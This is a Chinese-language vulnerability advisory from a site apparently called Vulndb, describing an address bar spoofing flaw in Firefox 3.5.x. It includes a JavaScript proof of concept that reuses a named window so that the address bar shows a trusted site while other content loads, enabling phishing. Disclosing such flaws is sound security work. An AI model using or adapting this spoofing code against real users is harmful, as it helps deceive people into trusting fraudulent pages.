Mozilla Firefox 3.5.x Address Bar Spoofing Vulnerability
- 发表于
- Vulndb
发布时间:2010-07-21
影响版本:
Mozilla Firefox 3.5.x
漏洞描述:
Firefox是非常流行的开源WEB浏览器
由于浏览器在处理某些伪协议时存在安全问题,导致恶意站点可以实现地址栏欺骗,用户可能在毫无知觉的情况下被引导进去一个钓鱼或者欺骗页面,该页面的地址栏是完全正确的地址,内容却可以被随意构造。
<*参考
http://Securitylab.ir/Advisories
*>
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
<script language="javascript"> function pause(pd) { date = new Date(); var curDate = null; do { var curDate = new Date(); } while(curDate-date < pd); } function Spoofing () { win = window.open('http://www.google.com','new') pause (3000) win = window.open('http://www.Securitylab.ir','new') } </script> <a href="javascript: Spoofing()">Click Here</a>
安全建议:
厂商补丁:
Mozilla
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.mozilla.org/
原文连接:Mozilla Firefox 3.5.x Address Bar Spoofing Vulnerability
所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。